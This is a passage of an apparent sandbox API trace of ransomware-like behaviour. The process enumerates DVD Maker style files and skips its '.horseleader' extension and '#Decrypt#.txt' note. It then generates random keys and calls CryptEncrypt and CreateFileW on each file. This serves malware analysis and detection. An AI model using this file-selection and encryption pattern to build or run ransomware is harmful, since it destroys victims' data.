Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-border.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.698] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724c6b5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724c6b5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6dc875, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1681, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_frame-highlight.png", cAlternateFileName="")) returned 1 [0251.698] lstrcmpiW (lpString1="Pets_frame-highlight.png", lpString2="Windows") returned -1 [0251.698] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png") returned 77 [0251.699] StrStrIW (lpFirst="Pets_frame-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.699] lstrcmpW (lpString1="Pets_frame-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.699] lstrcmpW (lpString1="Pets_frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.699] lstrlenW (lpString=".testttjffg") returned 11 [0251.699] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.699] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.699] CryptEncrypt 
(in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.699] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.699] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722fdb01, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722fdb01, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6dc875, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fe9, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_frame-imageMask.png", cAlternateFileName="")) returned 1 [0251.699] lstrcmpiW (lpString1="Pets_frame-imageMask.png", lpString2="Windows") returned -1 [0251.699] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png") returned 77 [0251.699] StrStrIW (lpFirst="Pets_frame-imageMask.png", lpSrch=".horseleader") returned 0x0 [0251.699] lstrcmpW (lpString1="Pets_frame-imageMask.png", lpString2="#Decrypt#.txt") returned 1 [0251.699] lstrcmpW (lpString1="Pets_frame-imageMask.png", lpString2="_uninstalling_.png") returned 1 [0251.699] lstrlenW (lpString=".testttjffg") returned 11 [0251.699] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png", lpSrch=".testttjffg") returned 0x0 [0251.699] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) 
returned 1 [0251.699] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.700] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722d79a4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722d79a4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea22689, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x643e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_frame-shadow.png", cAlternateFileName="")) returned 1 [0251.700] lstrcmpiW (lpString1="Pets_frame-shadow.png", lpString2="Windows") returned -1 [0251.701] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png") returned 74 [0251.701] StrStrIW (lpFirst="Pets_frame-shadow.png", lpSrch=".horseleader") returned 0x0 [0251.701] lstrcmpW (lpString1="Pets_frame-shadow.png", lpString2="#Decrypt#.txt") returned 1 [0251.701] lstrcmpW (lpString1="Pets_frame-shadow.png", lpString2="_uninstalling_.png") returned 1 [0251.701] lstrlenW (lpString=".testttjffg") returned 11 [0251.701] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png", lpSrch=".testttjffg") returned 0x0 [0251.701] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: 
pbBuffer=0x32aea98) returned 1 [0251.701] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.701] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724eccba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724eccba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_image-frame-backglow.png", cAlternateFileName="")) returned 1 [0251.701] lstrcmpiW (lpString1="Pets_image-frame-backglow.png", lpString2="Windows") returned -1 [0251.702] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png") returned 82 [0251.702] StrStrIW (lpFirst="Pets_image-frame-backglow.png", lpSrch=".horseleader") returned 0x0 [0251.702] lstrcmpW (lpString1="Pets_image-frame-backglow.png", lpString2="#Decrypt#.txt") returned 1 [0251.702] lstrcmpW (lpString1="Pets_image-frame-backglow.png", lpString2="_uninstalling_.png") returned 1 [0251.702] lstrlenW (lpString=".testttjffg") returned 11 [0251.702] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png", lpSrch=".testttjffg") returned 0x0 [0251.702] 
CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.702] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-backglow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.702] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724eccba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724eccba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1f0a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_image-frame-border.png", cAlternateFileName="")) returned 1 [0251.702] lstrcmpiW (lpString1="Pets_image-frame-border.png", lpString2="Windows") returned -1 [0251.702] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png") returned 80 [0251.702] StrStrIW (lpFirst="Pets_image-frame-border.png", lpSrch=".horseleader") returned 0x0 [0251.702] lstrcmpW (lpString1="Pets_image-frame-border.png", lpString2="#Decrypt#.txt") returned 1 [0251.702] lstrcmpW (lpString1="Pets_image-frame-border.png", lpString2="_uninstalling_.png") returned 1 [0251.702] lstrlenW (lpString=".testttjffg") returned 11 [0251.702] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png", lpSrch=".testttjffg") returned 0x0 [0251.702] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.702] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-border.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.703] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724c6b5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724c6b5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1146, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_image-frame-ImageMask.png", cAlternateFileName="")) returned 1 [0251.703] lstrcmpiW (lpString1="Pets_image-frame-ImageMask.png", lpString2="Windows") returned -1 [0251.703] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png") returned 83 [0251.703] StrStrIW (lpFirst="Pets_image-frame-ImageMask.png", lpSrch=".horseleader") returned 0x0 [0251.703] lstrcmpW (lpString1="Pets_image-frame-ImageMask.png", lpString2="#Decrypt#.txt") returned 1 [0251.703] lstrcmpW (lpString1="Pets_image-frame-ImageMask.png", lpString2="_uninstalling_.png") returned 1 [0251.703] lstrlenW 
(lpString=".testttjffg") returned 11 [0251.703] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png", lpSrch=".testttjffg") returned 0x0 [0251.703] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.703] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.704] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7240848c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7240848c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1ed0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_notes-txt-background.png", cAlternateFileName="")) returned 1 [0251.704] lstrcmpiW (lpString1="Pets_notes-txt-background.png", lpString2="Windows") returned -1 [0251.704] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png") returned 82 [0251.704] StrStrIW (lpFirst="Pets_notes-txt-background.png", lpSrch=".horseleader") returned 0x0 [0251.704] lstrcmpW (lpString1="Pets_notes-txt-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.704] lstrcmpW 
(lpString1="Pets_notes-txt-background.png", lpString2="_uninstalling_.png") returned 1 [0251.704] lstrlenW (lpString=".testttjffg") returned 11 [0251.704] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png", lpSrch=".testttjffg") returned 0x0 [0251.704] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.704] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_notes-txt-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.705] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fdde60, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71fdde60, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea487e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x41ca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="rollinghills.png", cAlternateFileName="")) returned 1 [0251.705] lstrcmpiW (lpString1="rollinghills.png", lpString2="Windows") returned -1 [0251.705] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png") returned 69 [0251.705] StrStrIW (lpFirst="rollinghills.png", lpSrch=".horseleader") returned 0x0 [0251.705] lstrcmpW (lpString1="rollinghills.png", lpString2="#Decrypt#.txt") returned 1 
[0251.705] lstrcmpW (lpString1="rollinghills.png", lpString2="_uninstalling_.png") returned 1 [0251.705] lstrlenW (lpString=".testttjffg") returned 11 [0251.705] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png", lpSrch=".testttjffg") returned 0x0 [0251.705] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.705] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\rollinghills.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.705] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7215ac02, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7215ac02, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ea6e945, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3dd2a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scenes_INTRO_BG.wmv", cAlternateFileName="")) returned 1 [0251.705] lstrcmpiW (lpString1="Scenes_INTRO_BG.wmv", lpString2="Windows") returned -1 [0251.705] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv") returned 72 [0251.705] StrStrIW (lpFirst="Scenes_INTRO_BG.wmv", lpSrch=".horseleader") returned 0x0 [0251.705] lstrcmpW (lpString1="Scenes_INTRO_BG.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.706] lstrcmpW 
(lpString1="Scenes_INTRO_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0251.706] lstrlenW (lpString=".testttjffg") returned 11 [0251.706] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv", lpSrch=".testttjffg") returned 0x0 [0251.706] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.706] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.706] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72180d5f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72180d5f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ec1184f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3fc64, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scenes_INTRO_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0251.706] lstrcmpiW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="Windows") returned -1 [0251.706] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv") returned 76 [0251.706] StrStrIW (lpFirst="Scenes_INTRO_BG_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.706] lstrcmpW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.706] 
lstrcmpW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.706] lstrlenW (lpString=".testttjffg") returned 11 [0251.706] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.706] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.706] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.707] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x721cd019, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x721cd019, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ec379ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2a8a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scenes_LOOP_BG.wmv", cAlternateFileName="")) returned 1 [0251.707] lstrcmpiW (lpString1="Scenes_LOOP_BG.wmv", lpString2="Windows") returned -1 [0251.707] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv") returned 71 [0251.707] StrStrIW (lpFirst="Scenes_LOOP_BG.wmv", lpSrch=".horseleader") returned 0x0 [0251.708] lstrcmpW (lpString1="Scenes_LOOP_BG.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.708] 
lstrcmpW (lpString1="Scenes_LOOP_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0251.708] lstrlenW (lpString=".testttjffg") returned 11 [0251.708] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv", lpSrch=".testttjffg") returned 0x0 [0251.708] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.708] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.708] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.708] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7223f430, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7223f430, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ecf6083, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd43ca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scenes_LOOP_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0251.708] lstrcmpiW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="Windows") returned -1 [0251.708] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv") returned 75 [0251.708] StrStrIW (lpFirst="Scenes_LOOP_BG_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.708] lstrcmpW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.708] 
lstrcmpW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.708] lstrlenW (lpString=".testttjffg") returned 11 [0251.708] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.708] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.708] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 